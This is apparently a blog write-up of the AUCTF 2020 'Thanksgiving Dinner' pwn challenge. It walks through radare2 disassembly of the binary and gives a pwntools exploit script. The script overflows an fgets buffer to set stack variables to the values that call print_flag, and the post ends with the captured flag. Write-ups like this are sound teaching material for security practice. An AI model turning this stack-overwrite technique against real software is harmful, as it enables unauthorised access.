AUCTF 2020 Writeup - Thanksgiving Dinner

April 19, 2020
ctf writeup pwn x86 auctf2020

Intro

This is the second pwn challenge of AUCTF 2020. It was solved 238 times and it was worth 408 points.

Description:

I just ate a huge dinner. I can barley eat anymore… so please don’t give me too much!

nc challenges.auctf.com 30011

Note: ASLR is disabled for this challenge

You could download the binary here

$ sha256sum ./thanksgiving_dinner
2307af59beead6a2377c3beb2ff26f70d5732ec6b651b5c31e58b8f692bfb70c thanksgiving_dinner

Exploitation

The program simply ask for an input. But it seems not vulnerable to a buffer overflow:

$ ./thanksgiving_dinner
Hi!
Welcome to my program... it's a little buggy...
Hey I heard you are searching for flags! Well I've got one. :)
Here you can have part of it!
auctf{

Sorry that's all I got!

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

So I checked the binary with checksec. Then I opened with radare2.

$ checksec ./thanksgiving_dinner
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
$ r2 -Ad ./thanksgiving_dinner

Then I found two promising functions:

[r2]> afl
.....
0x56556250    7 198          sym.vulnerable
0x56556360    3 162          sym.print_flag
....
[r2]> axt sym.vulnerable
main 0x5655623c [CALL] call sym.vulnerable
[r2]> axt sym.print_flag
sym.vulnerable 0x5655630b [CALL] call sym.print_flag

The vulnerable function is called by main. The print_flag function is called by vulnerable.

So here is the interesting part about the latter.

It gets an input a string and if some values are correct print_flag is called. Thanks the fgets we can overwrite those variables easily:

[r2]> pdf @sym.vulnerable
.....
│           0x565562d9      6a24           push 0x24                   ; 36
│           0x565562db      8d45d4         lea eax, [var_2ch]
│           0x565562de      50             push eax
│           0x565562df      e85cfdffff     call sym.imp.fgets
│           0x565562e4      83c410         add esp, 0x10
│           0x565562e7      817df4371300.  cmp dword [var_ch], 0x1337
│       ┌─< 0x565562ee      7520           jne 0x56556310
│       │   0x565562f0      837df0ec       cmp dword [var_10h], 0xffffffec
│      ┌──< 0x565562f4      7d1a           jge 0x56556310
│      ││   0x565562f6      837de814       cmp dword [var_18h], 0x14
│     ┌───< 0x565562fa      7414           je 0x56556310
│     │││   0x565562fc      817dec637466.  cmp dword [var_14h], 0x667463
│    ┌────< 0x56556303      750b           jne 0x56556310
│    ││││   0x56556305      837de42a       cmp dword [var_1ch], 0x2a
│   ┌─────< 0x56556309      7505           jne 0x56556310
│   │││││   0x5655630b      e850000000     call sym.print_flag
│   └└└└└─> 0x56556310      90             nop
│           0x56556311      8b5dfc         mov ebx, dword [var_4h]
│           0x56556314      c9             leave
└           0x56556315      c3             ret

So this is my exploit:

#!/usr/bin/python2

from pwn import *

prog = context.binary = ELF(os.getcwd() + "/turkey", checksec=False)

if len(sys.argv) > 1:
        host = "challenges.auctf.com"
        port = 30011
        t = remote(host, port)
else:
        t = prog.process()

offset = 16
payload = "A"*offset
payload += pack(0x2a)       # var_1ch
payload += pack(0x15)       # var_18h
payload += pack(0x667463)   # var_14h
payload += pack(0xffffffeb) # var_10h
payload += pack(0x1337)     # var_ch

t.sendline(payload)
t.interactive()
t.close()

And this is the flag:

$ cat flag.txt
auctf{I_s@id_1_w@s_fu11!}

thanksgiving dinner solved banner

AUCTF 2020 Writeup - Pick Up That CAN

May 1, 2020
ctf writeup car-hacking can-bus auctf2020

AUCTF 2020 Writeup - Remote School

April 20, 2020
ctf writeup pwn x86 auctf2020

AUCTF 2020 Writeup - Password Cracking Challenges

April 20, 2020
ctf writeup password cracking hashcat auctf2020